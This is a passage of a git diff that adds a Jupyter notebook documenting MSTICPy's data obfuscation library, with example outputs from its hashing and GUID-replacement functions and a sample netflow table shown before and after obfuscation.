+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/DataObfuscation.ipynb b/docs/notebooks/DataObfuscation.ipynb
new file mode 100644
index 000000000..b9f912001
--- /dev/null
+++ b/docs/notebooks/DataObfuscation.ipynb
@@ -0,0 +1,1672 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Data Obfuscation Library\n",
+    "\n",
+    "Sharing data, creating documents and doing public demonstrations often require that data containing\n",
+    "PII or other sensitive material be obfuscated.\n",
+    "\n",
+    "MSTICPy contains a simple library to obfuscate data using hashing and random mapping of values.\n",
+    "You can use these functions on a single data items or entire DataFrames.\n",
+    "\n",
+    "## Contents\n",
+    "- [Import the module](#Import-the-module)\n",
+    "- [Individual Obfuscation Functions](#Individual-Obfuscation-Functions)\n",
+    "- [Obfuscating DataFrames](#Obfuscating-DataFrames)\n",
+    "- [Creating custom column mappings](#Creating-custom-mappings)\n",
+    "- [Using hash_item with delimiters](#Using-hash_item-with-delimiters-to-preserve-the-structure/look-of-the-hashed-input)\n",
+    "- [Checking Your Obfuscation](#Checking-Your-Obfuscation)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Import the module"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "import pandas as pd\n",
+    "from msticpy.common.utility import md\n",
+    "from msticpy.data import data_obfus"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Read in some data for the examples"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "\n",
+    "netflow_df = pd.read_csv(\"data/az_net_flows.csv\")\n",
+    "# list is imported as string from csv - convert back to list with eval\n",
+    "def str_to_list(val):\n",
+    "    if isinstance(val, str):\n",
+    "        return eval(val)\n",
+    "netflow_df[\"PublicIPs\"] = netflow_df[\"PublicIPs\"].apply(str_to_list)\n",
+    "\n",
+    "# Define subset of output columns\n",
+    "out_cols = [\n",
+    "    'TenantId', 'TimeGenerated', 'FlowStartTime',\n",
+    "    'ResourceGroup', 'VMName', 'VMIPAddress', 'PublicIPs',\n",
+    "    'SrcIP', 'DestIP', 'L4Protocol', 'AllExtIPs'\n",
+    "]\n",
+    "netflow_df = netflow_df[out_cols]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Individual Obfuscation Functions\n",
+    "\n",
+    "Here we're importing individual functions but you can access them with the single\n",
+    "import statement above as:\n",
+    "```\n",
+    "data_obfus.hash_string(...)\n",
+    "```\n",
+    "etc.\n",
+    "\n",
+    "> **Note** In the next cell we're using a function to output documentation and examples.<br>\n",
+    "> You can ignore this. The usage of each function is show in the output of<br>\n",
+    "> the subsequent cells."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.data.data_obfus import (\n",
+    "    hash_dict,\n",
+    "    hash_ip,\n",
+    "    hash_item,\n",
+    "    hash_list,\n",
+    "    hash_sid,\n",
+    "    hash_string,\n",
+    "    replace_guid\n",
+    ")\n",
+    "\n",
+    "# Function to automate/format the examples below. You can ignore this\n",
+    "def show_func(func, examples):\n",
+    "    func_name = func.__name__\n",
+    "    if func.__name__.startswith(\"_\"):\n",
+    "        func_name = func_name[1:]\n",
+    "    md(func_name, \"bold\")\n",
+    "    print(func.__doc__)\n",
+    "    md(\"Examples\", \"bold\")\n",
+    "    for example in examples:\n",
+    "        if isinstance(example, tuple):\n",
+    "            arg, delim = example\n",
+    "            print(\n",
+    "                f\"{func_name}('{arg}', delim='{delim}') =>\", func(*example)\n",
+    "            )\n",
+    "        else:\n",
+    "            print(\n",
+    "                f\"{func_name}('{example}') =>\", func(example)\n",
+    "            )\n",
+    "    md(\"<br><hr><br>\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>hash_string</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>hash_string does a simple hash of the input. If the input is a numeric string it will output a numeric</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>hash_string</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "    Hash a simple string.\n",
+      "\n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    input_str : str\n",
+      "        The input string\n",
+      "\n",
+      "    Returns\n",
+      "    -------\n",
+      "    str\n",
+      "        The obfuscated output string\n",
+      "\n",
+      "    \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hash_string('sensitive data') => jdiqcnrqmlidkd\n",
+      "hash_string('42424') => 98478\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"hash_string\", \"large, bold\")\n",
+    "md(\"hash_string does a simple hash of the input. If the input is a numeric string it will output a numeric\")\n",
+    "show_func(hash_string, [\"sensitive data\", \"42424\"])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>hash_item</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>hash_item allows specification of delimiters. Useful for preserving the look of domains, emails, etc.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>hash_item</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "    Hash a simple string.\n",
+      "\n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    input_item : str\n",
+      "        The input string\n",
+      "    delim: str, optional\n",
+      "        A string of delimiters to use to split the input string\n",
+      "        prior to hashing.\n",
+      "\n",
+      "    Returns\n",
+      "    -------\n",
+      "    str\n",
+      "        The obfuscated output string\n",
+      "\n",
+      "    \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hash_item('sensitive data', delim=' ') => kdneqoiia laoe\n",
+      "hash_item('most-sensitive-data/here', delim=' /-') => kmea-kdneqoiia-laoe/fcec\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"hash_item\", \"large, bold\")\n",
+    "md(\"hash_item allows specification of delimiters. Useful for preserving the look of domains, emails, etc.\")\n",
+    "show_func(hash_item, [(\"sensitive data\", \" \"), (\"most-sensitive-data/here\", \" /-\")])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>hash_ip</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>hash_ip will output random mappings of input IP V4 and V6 addresses.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Within a Python session the mapping will remain constant.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>hash_ip</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "    Hash IP address or list of IP addresses.\n",
+      "\n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    input_item : Union[List[str], str]\n",
+      "        List of IP addresses or single IP address.\n",
+      "\n",
+      "    Returns\n",
+      "    -------\n",
+      "    Union[List[str], str]\n",
+      "        List of hashed addresses or single address.\n",
+      "        (depending on input)\n",
+      "\n",
+      "    \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hash_ip('192.168.3.1') => 192.168.84.105\n",
+      "hash_ip('2001:0db8:85a3:0000:0000:8a2e:0370:7334') => 85d6:7819:9cce:9af1:9af1:24ad:d338:7d03\n",
+      "hash_ip('['192.168.3.1', '192.168.5.2', '192.168.10.2']') => ['192.168.84.105', '192.168.172.202', '192.168.232.202']\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"hash_ip\", \"large, bold\")\n",
+    "md(\"hash_ip will output random mappings of input IP V4 and V6 addresses.\")\n",
+    "md(\"Within a Python session the mapping will remain constant.\")\n",
+    "show_func(hash_ip, [\n",
+    "    \"192.168.3.1\", \n",
+    "    \"2001:0db8:85a3:0000:0000:8a2e:0370:7334\",\n",
+    "    [\"192.168.3.1\", \"192.168.5.2\", \"192.168.10.2\"],\n",
+    "])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>hash_sid</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>hash_sid will randomize the domain-specific parts of a SID. It preserves built-in SIDs and well known RIDs (e.g. Admins -500)</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>hash_sid</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "    Hash a SID preserving well-known SIDs and the RID.\n",
+      "\n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    sid : str\n",
+      "        SID string\n",
+      "\n",
+      "    Returns\n",
+      "    -------\n",
+      "    str\n",
+      "        Hashed SID\n",
+      "\n",
+      "    \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hash_sid('S-1-5-21-1180699209-877415012-3182924384-1004') => S-1-5-21-3321821741-636458740-4143214142-1004\n",
+      "hash_sid('S-1-5-18') => S-1-5-18\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"hash_sid\", \"large, bold\")\n",
+    "md(\"hash_sid will randomize the domain-specific parts of a SID. It preserves built-in SIDs and well known RIDs (e.g. Admins -500)\")\n",
+    "show_func(hash_sid, [\"S-1-5-21-1180699209-877415012-3182924384-1004\", \"S-1-5-18\"])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>hash_list</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>hash_list will randomize a list of items preserving the list structure.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>hash_list</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "    Hash list of strings.\n",
+      "\n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    item_list : List[str]\n",
+      "        Input list\n",
+      "\n",
+      "    Returns\n",
+      "    -------\n",
+      "    List[str]\n",
+      "        Hashed list\n",
+      "\n",
+      "    \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hash_list('['S-1-5-21-1180699209-877415012-3182924384-1004', 'S-1-5-18']') => ['elkbjiboklpknokdeflikamojqjflqmicqiorqfbqboqe', 'nrllmpbd']\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"hash_list\", \"large, bold\")\n",
+    "md(\"hash_list will randomize a list of items preserving the list structure.\")\n",
+    "show_func(hash_list, [[\"S-1-5-21-1180699209-877415012-3182924384-1004\", \"S-1-5-18\"]])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>hash_dict</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>hash_dict will randomize a dict of items preserving the structure and the dict keys.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>hash_dict</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "    Hash dictionary values.\n",
+      "\n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    item_dict : Dict[str, Union[Dict[str, Any], List[Any], str]]\n",
+      "        Input item can be a Dict of strings, lists or other\n",
+      "        dictionaries.\n",
+      "\n",
+      "    Returns\n",
+      "    -------\n",
+      "    Dict[str, Any]\n",
+      "        Dictionary with hashed values.\n",
+      "\n",
+      "    \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hash_dict('{'SID1': 'S-1-5-21-1180699209-877415012-3182924384-1004', 'SID2': 'S-1-5-18'}') => {'SID1': 'elkbjiboklpknokdeflikamojqjflqmicqiorqfbqboqe', 'SID2': 'nrllmpbd'}\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"hash_dict\", \"large, bold\")\n",
+    "md(\"hash_dict will randomize a dict of items preserving the structure and the dict keys.\")\n",
+    "show_func(hash_dict, [{\"SID1\": \"S-1-5-21-1180699209-877415012-3182924384-1004\", \"SID2\": \"S-1-5-18\"}])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-size: 130%;font-weight: bold'>replace_guid</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>replace_guid will output a random UUID mapped to the input.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>An input GUID will be mapped to the same newly-generated output UUID</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>You can see that UUID #4 is the same as #1 and mapped to the same output UUID.</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>replace_guid</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Replace GUID/UUID with mapped random UUID.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        guid : str\n",
+      "            Input UUID.\n",
+      "\n",
+      "        Returns\n",
+      "        -------\n",
+      "        str\n",
+      "            Mapped UUID\n",
+      "\n",
+      "        \n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Examples</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "replace_guid('cf1b0b29-08ae-4528-839a-5f66eca2cce9') => 01ae8633-22e5-480f-b884-fc48588c25d9\n",
+      "replace_guid('ed63d29e-6288-4d66-b10d-8847096fc586') => 52cd2814-b5e4-48bd-80f2-51b503e50467\n",
+      "replace_guid('ac561203-99b2-4067-a525-60d45ea0d7ff') => ef059dc7-2d6e-4506-8619-05b346a6bc6b\n",
+      "replace_guid('cf1b0b29-08ae-4528-839a-5f66eca2cce9') => 01ae8633-22e5-480f-b884-fc48588c25d9\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><br><hr><br></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "md(\"replace_guid\", \"large, bold\")\n",
+    "md(\"replace_guid will output a random UUID mapped to the input.\")\n",
+    "md(\"An input GUID will be mapped to the same newly-generated output UUID\")\n",
+    "md(\"You can see that UUID #4 is the same as #1 and mapped to the same output UUID.\")\n",
+    "show_func(replace_guid, [\n",
+    "    \"cf1b0b29-08ae-4528-839a-5f66eca2cce9\",\n",
+    "    \"ed63d29e-6288-4d66-b10d-8847096fc586\",\n",
+    "    \"ac561203-99b2-4067-a525-60d45ea0d7ff\",\n",
+    "    \"cf1b0b29-08ae-4528-839a-5f66eca2cce9\",\n",
+    "])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Obfuscating DataFrames\n",
+    "\n",
+    "We can use the msticpy pandas extension to obfuscate an entire DataFrame.\n",
+    "\n",
+    "The obfuscation library contains a mapping for a number of common field names.\n",
+    "You can view this list by displaying the attribute:\n",
+    "```\n",
+    "data_obfus.OBFUS_COL_MAP\n",
+    "```\n",
+    "\n",
+    "In the first example, the TenantId, ResourceGroup, VMName have been obfuscated."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>FlowStartTime</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>VMName</th>\n",
+       "      <th>VMIPAddress</th>\n",
+       "      <th>PublicIPs</th>\n",
+       "      <th>SrcIP</th>\n",
+       "      <th>DestIP</th>\n",
+       "      <th>L4Protocol</th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2019-02-12 14:22:40.697</td>\n",
+       "      <td>2019-02-12 13:00:07.000</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td>msticalertswin1</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[65.55.44.109]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td>msticalertswin1</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[13.71.172.130, 13.71.172.128]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>13.71.172.128</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>asihuntomsworkspacerg</td>\n",
+       "      <td>msticalertswin1</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[13.71.172.130, 13.71.172.128]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>13.71.172.130</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId            TimeGenerated  \\\n",
+       "0  52b1ab41-869e-4138-9e40-2a4457f09bf0  2019-02-12 14:22:40.697   \n",
+       "1  52b1ab41-869e-4138-9e40-2a4457f09bf0  2019-02-12 14:22:40.681   \n",
+       "2  52b1ab41-869e-4138-9e40-2a4457f09bf0  2019-02-12 14:22:40.681   \n",
+       "\n",
+       "             FlowStartTime          ResourceGroup           VMName  \\\n",
+       "0  2019-02-12 13:00:07.000  asihuntomsworkspacerg  msticalertswin1   \n",
+       "1  2019-02-12 13:00:48.000  asihuntomsworkspacerg  msticalertswin1   \n",
+       "2  2019-02-12 13:00:48.000  asihuntomsworkspacerg  msticalertswin1   \n",
+       "\n",
+       "  VMIPAddress                       PublicIPs SrcIP DestIP L4Protocol  \\\n",
+       "0    10.0.3.5                  [65.55.44.109]   NaN    NaN          T   \n",
+       "1    10.0.3.5  [13.71.172.130, 13.71.172.128]   NaN    NaN          T   \n",
+       "2    10.0.3.5  [13.71.172.130, 13.71.172.128]   NaN    NaN          T   \n",
+       "\n",
+       "       AllExtIPs  \n",
+       "0   65.55.44.109  \n",
+       "1  13.71.172.128  \n",
+       "2  13.71.172.130  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>FlowStartTime</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>VMName</th>\n",
+       "      <th>VMIPAddress</th>\n",
+       "      <th>PublicIPs</th>\n",
+       "      <th>SrcIP</th>\n",
+       "      <th>DestIP</th>\n",
+       "      <th>L4Protocol</th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.697</td>\n",
+       "      <td>2019-02-12 13:00:07.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[65.55.44.109]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[13.71.172.130, 13.71.172.128]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>13.71.172.128</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>f9ef3428-3ccb-4ecd-8466-dbedc7044293</td>\n",
+       "      <td>2019-02-12 14:22:40.681</td>\n",
+       "      <td>2019-02-12 13:00:48.000</td>\n",
+       "      <td>ibmkajbmepnmiaeilfofa</td>\n",
+       "      <td>fmlmbnlpdcbnbnn</td>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>[13.71.172.130, 13.71.172.128]</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>T</td>\n",
+       "      <td>13.71.172.130</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId            TimeGenerated  \\\n",
